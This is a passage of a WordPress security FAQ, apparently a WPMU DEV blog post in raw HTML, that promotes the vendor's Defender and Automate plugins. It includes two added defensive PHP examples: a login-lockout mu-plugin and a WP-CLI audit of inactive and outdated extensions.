<span style="border: 0px; box-sizing: border-box; font-family: inherit; font-size: 22.4px; font-stretch: inherit; font-style: inherit; font-variant: inherit; font-weight: 700; line-height: inherit; margin: 0px; padding: 0px; text-size-adjust: none; vertical-align: baseline;">2. How can I audit my WordPress site’s security? How often should I do this?</span></h3>
<div style="border: 0px; box-sizing: border-box; color: #474747; font-family: Montserrat, sans-serif; font-size: 14px; font-stretch: inherit; font-variant-numeric: inherit; line-height: inherit; margin-bottom: 1em; padding: 0px; text-size-adjust: none; vertical-align: baseline;">
You can hire a security professional to do an audit, or you can use a plugin/service created by security professionals to perform an automated audit for you. In both cases, you need to make sure the person or company behind the plugin/service is trusted.</div>
<div style="border: 0px; box-sizing: border-box; color: #474747; font-family: Montserrat, sans-serif; font-size: 14px; font-stretch: inherit; font-variant-numeric: inherit; line-height: inherit; margin-bottom: 1em; padding: 0px; text-size-adjust: none; vertical-align: baseline;">
Auditing your site for vulnerabilities needs to be an ongoing task, not a one-off check.</div>
<div style="border: 0px; box-sizing: border-box; color: #474747; font-family: Montserrat, sans-serif; font-size: 14px; font-stretch: inherit; font-variant-numeric: inherit; line-height: inherit; margin-bottom: 1em; padding: 0px; text-size-adjust: none; vertical-align: baseline;">
This is why we created <a href="https://premium.wpmudev.org/project/wp-defender/" style="border: 0px; box-sizing: border-box; color: #297aa0; font-family: inherit; font-stretch: inherit; font-style: inherit; font-variant: inherit; font-weight: inherit; line-height: inherit; margin: 0px; padding: 0px; text-size-adjust: none; vertical-align: baseline;">Defender</a>. It will run the initial audit of your site and offer to fix all security holes it finds. It then continually monitors your site for any further security issues that may arise.</div>
<h3 style="border: 0px; box-sizing: border-box; color: #474747; font-family: Montserrat, sans-serif; font-size: 1.6em; font-stretch: inherit; font-variant-numeric: inherit; font-weight: inherit; line-height: inherit; margin: 1.25em 0px; padding: 0px; text-size-adjust: none; vertical-align: baseline;">
<span style="border: 0px; box-sizing: border-box; font-family: inherit; font-size: 22.4px; font-stretch: inherit; font-style: inherit; font-variant: inherit; font-weight: 700; line-height: inherit; margin: 0px; padding: 0px; text-size-adjust: none; vertical-align: baseline;">3. Should I use a web application firewall for my WordPress site?</span></h3>
<div style="border: 0px; box-sizing: border-box; color: #474747; font-family: Montserrat, sans-serif; font-size: 14px; font-stretch: inherit; font-variant-numeric: inherit; line-height: inherit; margin-bottom: 1em; padding: 0px; text-size-adjust: none; vertical-align: baseline;">
While not necessarily required, a WAF can add an extra layer of security to your site and server. While there are plugins that claim to provide WAF features, they can’t protect your server itself, or prevent your site going down from the load generated by an attack. We recommend a Cloud-based managed WAF like Cloudflare or Sucuri, and properly configuring your server to prevent bypassing. They can help protect against not only specific WordPress vulnerabilities in real time, but also stop DDoS and botnet attacks from taking down your site.</div>
<h3 style="border: 0px; box-sizing: border-box; color: #474747; font-family: Montserrat, sans-serif; font-size: 1.6em; font-stretch: inherit; font-variant-numeric: inherit; font-weight: inherit; line-height: inherit; margin: 1.25em 0px; padding: 0px; text-size-adjust: none; vertical-align: baseline;">
<span style="border: 0px; box-sizing: border-box; font-family: inherit; font-size: 22.4px; font-stretch: inherit; font-style: inherit; font-variant: inherit; font-weight: 700; line-height: inherit; margin: 0px; padding: 0px; text-size-adjust: none; vertical-align: baseline;">4. Do I need an SSL certificate if my site isn’t an ecommerce site?</span></h3>
<div style="border: 0px; box-sizing: border-box; color: #474747; font-family: Montserrat, sans-serif; font-size: 14px; font-stretch: inherit; font-variant-numeric: inherit; line-height: inherit; margin-bottom: 1em; padding: 0px; text-size-adjust: none; vertical-align: baseline;">
Yes, absolutely. Not only is having an SSL certificate a good security practice, but HTTPS is one of Google’s ranking signals. Back in 2014, Google called for “HTTPS everywhere” on the web in an effort to make the Internet safer, and has been encouraging website owners to switch from HTTP to HTTPS ever since.</div>
<div style="border: 0px; box-sizing: border-box; color: #474747; font-family: Montserrat, sans-serif; font-size: 14px; font-stretch: inherit; font-variant-numeric: inherit; line-height: inherit; margin-bottom: 1em; padding: 0px; text-size-adjust: none; vertical-align: baseline;">
Not everyone collects money online. Some websites collect information or have membership functionality. Without an SSL certificate, login credentials, cookies and form submissions for your site can be easily intercepted.</div>
<h3 style="border: 0px; box-sizing: border-box; color: #474747; font-family: Montserrat, sans-serif; font-size: 1.6em; font-stretch: inherit; font-variant-numeric: inherit; font-weight: inherit; line-height: inherit; margin: 1.25em 0px; padding: 0px; text-size-adjust: none; vertical-align: baseline;">
<span style="border: 0px; box-sizing: border-box; font-family: inherit; font-size: 22.4px; font-stretch: inherit; font-style: inherit; font-variant: inherit; font-weight: 700; line-height: inherit; margin: 0px; padding: 0px; text-size-adjust: none; vertical-align: baseline;">5. I have multiple site admins. What should I know about access management (password strength, HTTPS)?</span></h3>
<div style="border: 0px; box-sizing: border-box; color: #474747; font-family: Montserrat, sans-serif; font-size: 14px; font-stretch: inherit; font-variant-numeric: inherit; line-height: inherit; margin-bottom: 1em; padding: 0px; text-size-adjust: none; vertical-align: baseline;">
Use HTTPS to prevent eavesdropping during the login process. Putting define( 'FORCE_SSL_ADMIN', true ); in your wp-config.php file will do that for you, provided you have an SSL certificate installed.</div>
<div style="border: 0px; box-sizing: border-box; color: #474747; font-family: Montserrat, sans-serif; font-size: 14px; font-stretch: inherit; font-variant-numeric: inherit; line-height: inherit; margin-bottom: 1em; padding: 0px; text-size-adjust: none; vertical-align: baseline;">
You should also consider disabling the plugin or theme editor to prevent overzealous users from editing sensitive files and potentially crashing your site. Do this by adding define( 'DISALLOW_FILE_EDIT', true ); to your wp-config.php file. This provides an additional layer of security if a hacker gains access to a highly privileged user account.</div>
<div style="border: 0px; box-sizing: border-box; color: #474747; font-family: Montserrat, sans-serif; font-size: 14px; font-stretch: inherit; font-variant-numeric: inherit; line-height: inherit; margin-bottom: 1em; padding: 0px; text-size-adjust: none; vertical-align: baseline;">
Encourage site admins to use a password manager with strong, random passwords, and/or use a plugin like Defender to require two-factor authentication for specific roles.</div>
<h3 style="border: 0px; box-sizing: border-box; color: #474747; font-family: Montserrat, sans-serif; font-size: 1.6em; font-stretch: inherit; font-variant-numeric: inherit; font-weight: inherit; line-height: inherit; margin: 1.25em 0px; padding: 0px; text-size-adjust: none; vertical-align: baseline;">
<span style="border: 0px; box-sizing: border-box; font-family: inherit; font-size: 22.4px; font-stretch: inherit; font-style: inherit; font-variant: inherit; font-weight: 700; line-height: inherit; margin: 0px; padding: 0px; text-size-adjust: none; vertical-align: baseline;">6. How can I scan my WordPress site for vulnerabilities?</span></h3>
<div style="border: 0px; box-sizing: border-box; color: #474747; font-family: Montserrat, sans-serif; font-size: 14px; font-stretch: inherit; font-variant-numeric: inherit; line-height: inherit; margin-bottom: 1em; padding: 0px; text-size-adjust: none; vertical-align: baseline;">
There are a number of tools out there to scan your site for vulnerabilities. Earlier I mentioned our WordPress Checkup tool and also our security plugin Defender. Both are available for free. WP Checkup provides a black-box scan and overview of your site’s performance, security and SEO, while Defender will go more in-depth with security scanning and offer to fix the issues for you.</div>
<div style="border: 0px; box-sizing: border-box; color: #474747; font-family: Montserrat, sans-serif; font-size: 14px; font-stretch: inherit; font-variant-numeric: inherit; line-height: inherit; margin-bottom: 1em; padding: 0px; text-size-adjust: none; vertical-align: baseline;">
For more on how to scan your site, we’ve got a great <a href="https://premium.wpmudev.org/blog/security-scanning/" style="border: 0px; box-sizing: border-box; color: #297aa0; font-family: inherit; font-stretch: inherit; font-style: inherit; font-variant: inherit; font-weight: inherit; line-height: inherit; margin: 0px; padding: 0px; text-size-adjust: none; vertical-align: baseline;">guide</a> on our blog.</div>
<h3 style="border: 0px; box-sizing: border-box; color: #474747; font-family: Montserrat, sans-serif; font-size: 1.6em; font-stretch: inherit; font-variant-numeric: inherit; font-weight: inherit; line-height: inherit; margin: 1.25em 0px; padding: 0px; text-size-adjust: none; vertical-align: baseline;">
<span style="border: 0px; box-sizing: border-box; font-family: inherit; font-size: 22.4px; font-stretch: inherit; font-style: inherit; font-variant: inherit; font-weight: 700; line-height: inherit; margin: 0px; padding: 0px; text-size-adjust: none; vertical-align: baseline;">7. I’m a small business. Why would hackers bother with my site?</span></h3>
<div style="border: 0px; box-sizing: border-box; color: #474747; font-family: Montserrat, sans-serif; font-size: 14px; font-stretch: inherit; font-variant-numeric: inherit; line-height: inherit; margin-bottom: 1em; padding: 0px; text-size-adjust: none; vertical-align: baseline;">
Hackers aren’t necessarily interested in you. In fact, it’s very unlikely (unless you are a large corporation or government agency) that hackers are targeting <em style="border: 0px; box-sizing: border-box; font-family: inherit; font-stretch: inherit; font-variant: inherit; font-weight: inherit; line-height: inherit; margin: 0px; padding: 0px; text-size-adjust: none; vertical-align: baseline;">you</em> specifically at all.</div>
<div style="border: 0px; box-sizing: border-box; color: #474747; font-family: Montserrat, sans-serif; font-size: 14px; font-stretch: inherit; font-variant-numeric: inherit; line-height: inherit; margin-bottom: 1em; padding: 0px; text-size-adjust: none; vertical-align: baseline;">
Instead, they are looking for sites they can hack in order to run phishing scams, malicious redirects or even to try to game Google by inserting links.</div>
<div style="border: 0px; box-sizing: border-box; color: #474747; font-family: Montserrat, sans-serif; font-size: 14px; font-stretch: inherit; font-variant-numeric: inherit; line-height: inherit; margin-bottom: 1em; padding: 0px; text-size-adjust: none; vertical-align: baseline;">
Our members often contact our support team after activating Defender’s IP Lockouts feature. They instantly notice a steady stream of IPs already hitting their new website with failed login attempts and 404 errors from scans looking for vulnerabilities to exploit. It’s a fairly common issue for WordPress-based websites.</div>
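The failed-login stream described above is exactly what a lockout hook makes visible, and it is also where the access-management advice from question 5 (HTTPS for the login, no file editor, strong passwords) fits. The must-use plugin below is an added example written for this post, not Defender's code or any other WPMU DEV code: it counts failures per client IP with core transients, refuses that IP for an hour after five failures inside fifteen minutes (thresholds are this example's own choice), e-mails the site admin and clears the counter on a successful login. The file path, the ll_ function names and the thresholds are assumptions; the hooks, the transient functions and the wp-config.php constants are WordPress core.

```php
<?php
/**
 * Plugin Name: Login Lockout (added example)
 * Description: Temporarily refuses logins from an IP after repeated failures,
 *              using only WordPress core hooks and transients.
 *
 * Added example for this post, not WPMU DEV's Defender. Save it as
 * wp-content/mu-plugins/login-lockout.php (assumed path; mu-plugins load
 * automatically and cannot be switched off from the dashboard).
 *
 * Pair it with the wp-config.php constants the post recommends:
 *   define( 'FORCE_SSL_ADMIN', true );    // login and admin only over HTTPS
 *   define( 'DISALLOW_FILE_EDIT', true ); // no in-dashboard theme/plugin editor
 */

// Policy values are this example's own choices, not WordPress defaults.
define( 'LL_MAX_FAILURES', 5 );        // failures allowed inside one window
define( 'LL_WINDOW_SECONDS', 15 * 60 ); // window in which failures are counted
define( 'LL_LOCKOUT_SECONDS', 60 * 60 ); // how long a locked IP is refused

/**
 * Client address as PHP sees it. Behind Cloudflare or another proxy,
 * REMOTE_ADDR is the proxy, so every visitor would share one counter:
 * restore the real client IP at the web server (mod_remoteip / realip)
 * for trusted proxy ranges only; never trust X-Forwarded-For blindly.
 */
function ll_client_ip() {
    $ip = isset( $_SERVER['REMOTE_ADDR'] ) ? $_SERVER['REMOTE_ADDR'] : '';
    return filter_var( $ip, FILTER_VALIDATE_IP ) ? $ip : '0.0.0.0';
}

/** Transient names have a length limit, so key on a hash of the IP. */
function ll_key( $prefix, $ip ) {
    return $prefix . md5( $ip );
}

function ll_is_locked( $ip ) {
    return false !== get_transient( ll_key( 'll_lock_', $ip ) );
}

/** Runs on every failed login (core fires wp_login_failed with the username). */
function ll_record_failure( $username ) {
    $ip = ll_client_ip();
    if ( ll_is_locked( $ip ) ) {
        return; // already locked; the refusal below fires this hook too
    }
    $fail_key = ll_key( 'll_fail_', $ip );
    $failures = (int) get_transient( $fail_key ) + 1;
    set_transient( $fail_key, $failures, LL_WINDOW_SECONDS );

    if ( $failures >= LL_MAX_FAILURES ) {
        set_transient( ll_key( 'll_lock_', $ip ), time(), LL_LOCKOUT_SECONDS );
        delete_transient( $fail_key );
        // Log and notify so the pattern the post describes is visible to the admin.
        $msg = sprintf(
            'login-lockout: %s locked for %d s after %d failed logins (last username: %s)',
            $ip, LL_LOCKOUT_SECONDS, $failures, sanitize_user( $username )
        );
        error_log( $msg );
        wp_mail( get_option( 'admin_email' ), 'Login lockout on ' . home_url(), $msg );
    }
}
add_action( 'wp_login_failed', 'll_record_failure' );

/**
 * Refuse a locked IP even when the password is correct. Priority 30 runs after
 * core's username/password check (priority 20), which would otherwise replace
 * an earlier WP_Error with the authenticated WP_User.
 */
function ll_refuse_locked( $user, $username, $password ) {
    if ( ll_is_locked( ll_client_ip() ) ) {
        return new WP_Error( 'll_locked', 'Too many failed logins from your address. Try again later.' );
    }
    return $user;
}
add_filter( 'authenticate', 'll_refuse_locked', 30, 3 );

/** A successful login clears the counter so a single typo does not accumulate. */
function ll_clear_on_success( $user_login, $user ) {
    delete_transient( ll_key( 'll_fail_', ll_client_ip() ) );
}
add_action( 'wp_login', 'll_clear_on_success', 10, 2 );
```

Because the check sits on the authenticate filter it also covers XML-RPC logins, which go through the same core path as wp-login.php. If the site sits behind a cloud WAF such as Cloudflare, as recommended under question 3, the web server must restore the real client address first; otherwise every visitor shares the proxy's counter and a burst of failures from anywhere locks everyone out.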
<h3 style="border: 0px; box-sizing: border-box; color: #474747; font-family: Montserrat, sans-serif; font-size: 1.6em; font-stretch: inherit; font-variant-numeric: inherit; font-weight: inherit; line-height: inherit; margin: 1.25em 0px; padding: 0px; text-size-adjust: none; vertical-align: baseline;">
<span style="border: 0px; box-sizing: border-box; font-family: inherit; font-size: 22.4px; font-stretch: inherit; font-style: inherit; font-variant: inherit; font-weight: 700; line-height: inherit; margin: 0px; padding: 0px; text-size-adjust: none; vertical-align: baseline;">8. I’ve been hacked. What should I do next?</span></h3>
<div style="border: 0px; box-sizing: border-box; color: #474747; font-family: Montserrat, sans-serif; font-size: 14px; font-stretch: inherit; font-variant-numeric: inherit; line-height: inherit; margin-bottom: 1em; padding: 0px; text-size-adjust: none; vertical-align: baseline;">
Make a backup of your site right away. You might be thinking, “Why? It’s already hacked.” Some hosts will delete your site immediately when they find out it has been hacked; this is to avoid anything malicious affecting the rest of the network. The only thing worse than having your site hacked is having it deleted.</div>
<div style="border: 0px; box-sizing: border-box; color: #474747; font-family: Montserrat, sans-serif; font-size: 14px; font-stretch: inherit; font-variant-numeric: inherit; line-height: inherit; margin-bottom: 1em; padding: 0px; text-size-adjust: none; vertical-align: baseline;">
Now that you have your hacked site backed up, you can focus on cleaning it up. If you know approximately when your site was hacked, restore it using a pre-hack site backup, run a security audit and fix any vulnerabilities to avoid the same hack happening again. Or just install a security plugin such as Defender that will do both the security audit and close up vulnerabilities for you, along with the important task of ongoing monitoring.</div>
<div style="border: 0px; box-sizing: border-box; color: #474747; font-family: Montserrat, sans-serif; font-size: 14px; font-stretch: inherit; font-variant-numeric: inherit; line-height: inherit; margin-bottom: 1em; padding: 0px; text-size-adjust: none; vertical-align: baseline;">
Sometimes you might not have backups, or can’t roll back far enough. In those cases, you will need to manually clean up your site, which is a bit more involved. You can learn how in our website clean-up <a href="https://premium.wpmudev.org/blog/cleaning-up-after-wordpress-hack/" style="border: 0px; box-sizing: border-box; color: #297aa0; font-family: inherit; font-stretch: inherit; font-style: inherit; font-variant: inherit; font-weight: inherit; line-height: inherit; margin: 0px; padding: 0px; text-size-adjust: none; vertical-align: baseline;">guide</a>.</div>
<h3 style="border: 0px; box-sizing: border-box; color: #474747; font-family: Montserrat, sans-serif; font-size: 1.6em; font-stretch: inherit; font-variant-numeric: inherit; font-weight: inherit; line-height: inherit; margin: 1.25em 0px; padding: 0px; text-size-adjust: none; vertical-align: baseline;">
<span style="border: 0px; box-sizing: border-box; font-family: inherit; font-size: 22.4px; font-stretch: inherit; font-style: inherit; font-variant: inherit; font-weight: 700; line-height: inherit; margin: 0px; padding: 0px; text-size-adjust: none; vertical-align: baseline;">9. How important are theme and plugin updates?</span></h3>
<div style="border: 0px; box-sizing: border-box; color: #474747; font-family: Montserrat, sans-serif; font-size: 14px; font-stretch: inherit; font-variant-numeric: inherit; line-height: inherit; margin-bottom: 1em; padding: 0px; text-size-adjust: none; vertical-align: baseline;">
Incredibly important. In fact, they are the number-one cause of WordPress hacks. Keeping them up to date should be at the top of your to-do list.</div>
<div style="border: 0px; box-sizing: border-box; color: #474747; font-family: Montserrat, sans-serif; font-size: 14px; font-stretch: inherit; font-variant-numeric: inherit; line-height: inherit; margin-bottom: 1em; padding: 0px; text-size-adjust: none; vertical-align: baseline;">
But, not everybody – especially if you have lots of sites – has time for this. It’s a pain logging into all the sites to check, and then takes forever to do.</div>
<div style="border: 0px; box-sizing: border-box; color: #474747; font-family: Montserrat, sans-serif; font-size: 14px; font-stretch: inherit; font-variant-numeric: inherit; line-height: inherit; margin-bottom: 1em; padding: 0px; text-size-adjust: none; vertical-align: baseline;">
Which is why we created Automate.</div>
<div style="border: 0px; box-sizing: border-box; color: #474747; font-family: Montserrat, sans-serif; font-size: 14px; font-stretch: inherit; font-variant-numeric: inherit; line-height: inherit; margin-bottom: 1em; padding: 0px; text-size-adjust: none; vertical-align: baseline;">
It detects when an upgrade is available for a trusted theme or plugin (you can select all of your plugins and themes, or just the ones you trust), takes a screenshot of your site, automatically backs it up, performs the upgrades, pings your site to make sure it’s not down or broken and then takes a second screenshot and compares it to the original one to make sure the update caused no significant visual changes.</div>
<div style="border: 0px; box-sizing: border-box; color: #474747; font-family: Montserrat, sans-serif; font-size: 14px; font-stretch: inherit; font-variant-numeric: inherit; line-height: inherit; margin-bottom: 1em; padding: 0px; text-size-adjust: none; vertical-align: baseline;">
And then, it immediately sends you an email (although you can have a digest if you like) letting you know what went down.</div>
<table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody>
<tr><td style="text-align: center;"><a href="http://cdn4.wpbeginner.com/wp-content/uploads/2016/09/strongpasswords.jpg" imageanchor="1" style="margin-left: auto; margin-right: auto;"><img border="0" src="http://cdn4.wpbeginner.com/wp-content/uploads/2016/09/strongpasswords.jpg" data-original-height="347" data-original-width="520" height="213" width="320" /></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;">From Wpbeginner.com</td></tr>
</tbody></table>
<h3 style="border: 0px; box-sizing: border-box; color: #474747; font-family: Montserrat, sans-serif; font-size: 1.6em; font-stretch: inherit; font-variant-numeric: inherit; font-weight: inherit; line-height: inherit; margin: 1.25em 0px; padding: 0px; text-size-adjust: none; vertical-align: baseline;">
<span style="border: 0px; box-sizing: border-box; font-family: inherit; font-size: 22.4px; font-stretch: inherit; font-style: inherit; font-variant: inherit; font-weight: 700; line-height: inherit; margin: 0px; padding: 0px; text-size-adjust: none; vertical-align: baseline;">10. Do I need to install WordPress updates? Should I install them immediately?</span></h3>
<div style="border: 0px; box-sizing: border-box; color: #474747; font-family: Montserrat, sans-serif; font-size: 14px; font-stretch: inherit; font-variant-numeric: inherit; line-height: inherit; margin-bottom: 1em; padding: 0px; text-size-adjust: none; vertical-align: baseline;">
Absolutely, and of course, Automate updates WordPress itself.</div>
<h3 style="border: 0px; box-sizing: border-box; color: #474747; font-family: Montserrat, sans-serif; font-size: 1.6em; font-stretch: inherit; font-variant-numeric: inherit; font-weight: inherit; line-height: inherit; margin: 1.25em 0px; padding: 0px; text-size-adjust: none; vertical-align: baseline;">
<span style="border: 0px; box-sizing: border-box; font-family: inherit; font-size: 22.4px; font-stretch: inherit; font-style: inherit; font-variant: inherit; font-weight: 700; line-height: inherit; margin: 0px; padding: 0px; text-size-adjust: none; vertical-align: baseline;">11. Should I host my own WordPress site?</span></h3>
<div style="border: 0px; box-sizing: border-box; color: #474747; font-family: Montserrat, sans-serif; font-size: 14px; font-stretch: inherit; font-variant-numeric: inherit; line-height: inherit; margin-bottom: 1em; padding: 0px; text-size-adjust: none; vertical-align: baseline;">
If you don’t, then much (if not all) of the advice in this post isn’t relevant. If you use a platform like WordPress.com or CampusPress, security measures and updates will be taken care of for you. Whereas if you host WordPress yourself, then this post is definitely for you as security should be your number one priority.</div>
<div style="border: 0px; box-sizing: border-box; color: #474747; font-family: Montserrat, sans-serif; font-size: 14px; font-stretch: inherit; font-variant-numeric: inherit; line-height: inherit; margin-bottom: 1em; padding: 0px; text-size-adjust: none; vertical-align: baseline;">
If you do host WordPress yourself, you get far greater flexibility and the capacity to more easily (and more affordably!) meet your own and your clients’ needs.</div>
<h3 style="border: 0px; box-sizing: border-box; color: #474747; font-family: Montserrat, sans-serif; font-size: 1.6em; font-stretch: inherit; font-variant-numeric: inherit; font-weight: inherit; line-height: inherit; margin: 1.25em 0px; padding: 0px; text-size-adjust: none; vertical-align: baseline;">
<span style="border: 0px; box-sizing: border-box; font-family: inherit; font-size: 22.4px; font-stretch: inherit; font-style: inherit; font-variant: inherit; font-weight: 700; line-height: inherit; margin: 0px; padding: 0px; text-size-adjust: none; vertical-align: baseline;">12. How often should I backup my WordPress site? Why?</span></h3>
<div style="border: 0px; box-sizing: border-box; color: #474747; font-family: Montserrat, sans-serif; font-size: 14px; font-stretch: inherit; font-variant-numeric: inherit; line-height: inherit; margin-bottom: 1em; padding: 0px; text-size-adjust: none; vertical-align: baseline;">
As often as possible. Although realistically, you should be good with a weekly backup and keeping the last three backups, especially if your site is actively monitored.</div>
<div style="border: 0px; box-sizing: border-box; color: #474747; font-family: Montserrat, sans-serif; font-size: 14px; font-stretch: inherit; font-variant-numeric: inherit; line-height: inherit; margin-bottom: 1em; padding: 0px; text-size-adjust: none; vertical-align: baseline;">
You could also choose to have a separate monthly backup and retain the last six or so files, just in case something happens and you don’t immediately notice.</div>
<div style="border: 0px; box-sizing: border-box; color: #474747; font-family: Montserrat, sans-serif; font-size: 14px; font-stretch: inherit; font-variant-numeric: inherit; line-height: inherit; margin-bottom: 1em; padding: 0px; text-size-adjust: none; vertical-align: baseline;">
Good WordPress security tools should alert you to any issues. So generally, a weekly backup is fine. And excellent WordPress security tools will back up your site automatically before every upgrade.</div>
<h3 style="border: 0px; box-sizing: border-box; color: #474747; font-family: Montserrat, sans-serif; font-size: 1.6em; font-stretch: inherit; font-variant-numeric: inherit; font-weight: inherit; line-height: inherit; margin: 1.25em 0px; padding: 0px; text-size-adjust: none; vertical-align: baseline;">
<span style="border: 0px; box-sizing: border-box; font-family: inherit; font-size: 22.4px; font-stretch: inherit; font-style: inherit; font-variant: inherit; font-weight: 700; line-height: inherit; margin: 0px; padding: 0px; text-size-adjust: none; vertical-align: baseline;">13. How can I secure my hosting server? Are there certain actions I should take?</span></h3>
<div style="border: 0px; box-sizing: border-box; color: #474747; font-family: Montserrat, sans-serif; font-size: 14px; font-stretch: inherit; font-variant-numeric: inherit; line-height: inherit; margin-bottom: 1em; padding: 0px; text-size-adjust: none; vertical-align: baseline;">
If you use shared or managed hosting, then that is generally the responsibility of your provider. Just make sure you use a strong random password for your SFTP/control panel login, and enable two-factor authentication if they support it.</div>
<div style="border: 0px; box-sizing: border-box; color: #474747; font-family: Montserrat, sans-serif; font-size: 14px; font-stretch: inherit; font-variant-numeric: inherit; line-height: inherit; margin-bottom: 1em; padding: 0px; text-size-adjust: none; vertical-align: baseline;">
If you manage your own server or VM (Digital Ocean, AWS, etc.), then it is important you properly configure your firewall rules, SSH access and filesystem permissions, and stay on top of package and kernel updates.</div>
<h3 style="border: 0px; box-sizing: border-box; color: #474747; font-family: Montserrat, sans-serif; font-size: 1.6em; font-stretch: inherit; font-variant-numeric: inherit; font-weight: inherit; line-height: inherit; margin: 1.25em 0px; padding: 0px; text-size-adjust: none; vertical-align: baseline;">
<span style="border: 0px; box-sizing: border-box; font-family: inherit; font-size: 22.4px; font-stretch: inherit; font-style: inherit; font-variant: inherit; font-weight: 700; line-height: inherit; margin: 0px; padding: 0px; text-size-adjust: none; vertical-align: baseline;">14. What are the most common WordPress vulnerabilities?</span></h3>
<div style="border: 0px; box-sizing: border-box; color: #474747; font-family: Montserrat, sans-serif; font-size: 14px; font-stretch: inherit; font-variant-numeric: inherit; line-height: inherit; margin-bottom: 1em; padding: 0px; text-size-adjust: none; vertical-align: baseline;">
Nine times out of 10, when a WordPress site is hacked, it can be traced back to a vulnerability in a theme, plugin or old version of WordPress core. That is why the single most important thing you can do to protect your site is use themes and plugins from trusted providers who care about security and actively provide updates, and then keep your themes, plugins and core updated! Defender can tell you if you have a version of a theme, plugin or core installed that has a published vulnerability, and our Automate tool can keep them all updated.</div>
<h3 style="border: 0px; box-sizing: border-box; color: #474747; font-family: Montserrat, sans-serif; font-size: 1.6em; font-stretch: inherit; font-variant-numeric: inherit; font-weight: inherit; line-height: inherit; margin: 1.25em 0px; padding: 0px; text-size-adjust: none; vertical-align: baseline;">
<span style="border: 0px; box-sizing: border-box; font-family: inherit; font-size: 22.4px; font-stretch: inherit; font-style: inherit; font-variant: inherit; font-weight: 700; line-height: inherit; margin: 0px; padding: 0px; text-size-adjust: none; vertical-align: baseline;">15. Should I remove my deactivated plugins?</span></h3>
<div style="border: 0px; box-sizing: border-box; color: #474747; font-family: Montserrat, sans-serif; font-size: 14px; font-stretch: inherit; font-variant-numeric: inherit; line-height: inherit; margin-bottom: 1em; padding: 0px; text-size-adjust: none; vertical-align: baseline;">
Any plugin or theme on your server, whether or not it is active, can be a potential security vulnerability, so you must stay on top of updates for all of them. To lower your attack surface, it is best to remove unused plugins or themes.</div>
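Questions 9, 14 and 15 come down to one inventory: what is installed, what is inactive, and what is behind its current release. The WP-CLI command below is an added example for this post (not Defender, Automate or any other WPMU DEV code) that builds that inventory from WordPress core's own plugin list and update transients, so the "inactive" list is the removal candidate list and the "outdated" list is the update queue. The file path, the ea_ names and the extension-audit command name are assumptions; get_plugins(), wp_get_themes(), the update_plugins and update_themes transients and the WP_CLI calls are real core and WP-CLI APIs.

```php
<?php
/**
 * Plugin Name: Extension Audit (added example)
 * Description: Lists plugins and themes that are inactive (candidates for
 *              removal) or have a pending update, using core's own update data.
 *
 * Added example for this post, not WPMU DEV's Defender or Automate. Save it as
 * wp-content/mu-plugins/extension-audit.php (assumed path) and run
 *   wp extension-audit
 * with WP-CLI; the command name is this example's own.
 */

/** Build the report. Returns array( 'inactive' => [...], 'outdated' => [...] ). */
function ea_collect_report() {
    if ( ! function_exists( 'get_plugins' ) ) {
        require_once ABSPATH . 'wp-admin/includes/plugin.php';
    }
    // Refresh core's update caches so the report reflects current releases.
    wp_update_plugins();
    wp_update_themes();
    $plugin_updates = get_site_transient( 'update_plugins' );
    $theme_updates  = get_site_transient( 'update_themes' );
    $plugin_pending = isset( $plugin_updates->response ) ? $plugin_updates->response : array();
    $theme_pending  = isset( $theme_updates->response ) ? $theme_updates->response : array();

    $report = array( 'inactive' => array(), 'outdated' => array() );

    foreach ( get_plugins() as $file => $data ) {
        $active = is_plugin_active( $file )
            || ( is_multisite() && is_plugin_active_for_network( $file ) );
        if ( ! $active ) {
            // Inactive code is still reachable over HTTP and still exploitable.
            $report['inactive'][] = sprintf( 'plugin %s (%s)', $data['Name'], $file );
        }
        if ( ! empty( $plugin_pending[ $file ] ) ) {
            $report['outdated'][] = sprintf( 'plugin %s %s -> %s',
                $data['Name'], $data['Version'], $plugin_pending[ $file ]->new_version );
        }
    }

    // Keep the active theme and its parent; every other theme is removable.
    $current = wp_get_theme();
    $in_use  = array( $current->get_stylesheet(), $current->get_template() );
    foreach ( wp_get_themes() as $slug => $theme ) {
        if ( ! in_array( $slug, $in_use, true ) ) {
            $report['inactive'][] = sprintf( 'theme %s (%s)', $theme->get( 'Name' ), $slug );
        }
        if ( ! empty( $theme_pending[ $slug ] ) ) {
            $report['outdated'][] = sprintf( 'theme %s %s -> %s',
                $theme->get( 'Name' ), $theme->get( 'Version' ), $theme_pending[ $slug ]['new_version'] );
        }
    }
    return $report;
}

if ( defined( 'WP_CLI' ) && WP_CLI ) {
    WP_CLI::add_command( 'extension-audit', function () {
        $report = ea_collect_report();
        foreach ( $report['outdated'] as $line ) {
            WP_CLI::warning( 'update pending: ' . $line );
        }
        foreach ( $report['inactive'] as $line ) {
            WP_CLI::log( 'inactive, consider removing: ' . $line );
        }
        if ( empty( $report['outdated'] ) && empty( $report['inactive'] ) ) {
            WP_CLI::success( 'Everything installed is active and up to date.' );
        }
    } );
}
```

The report deliberately flags the parent of a child theme as in use, since deleting it would break the active theme, and it treats network-activated plugins on multisite as active. Running it from cron across many sites gives the same overview the post describes logging into each dashboard for, without the manual round-trip.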
<h3 style="border: 0px; box-sizing: border-box; color: #474747; font-family: Montserrat, sans-serif; font-size: 1.6em; font-stretch: inherit; font-variant-numeric: inherit; font-weight: inherit; line-height: inherit; margin: 1.25em 0px; padding: 0px; text-size-adjust: none; vertical-align: baseline;">
<span style="border: 0px; box-sizing: border-box; font-family: inherit; font-size: 22.4px; font-stretch: inherit; font-style: inherit; font-variant: inherit; font-weight: 700; line-height: inherit; margin: 0px; padding: 0px; text-size-adjust: none; vertical-align: baseline;">16. What WordPress security tools should I use?</span></h3>
<div style="border: 0px; box-sizing: border-box; color: #474747; font-family: Montserrat, sans-serif; font-size: 14px; font-stretch: inherit; font-variant-numeric: inherit; line-height: inherit; margin-bottom: 1em; padding: 0px; text-size-adjust: none; vertical-align: baseline;">
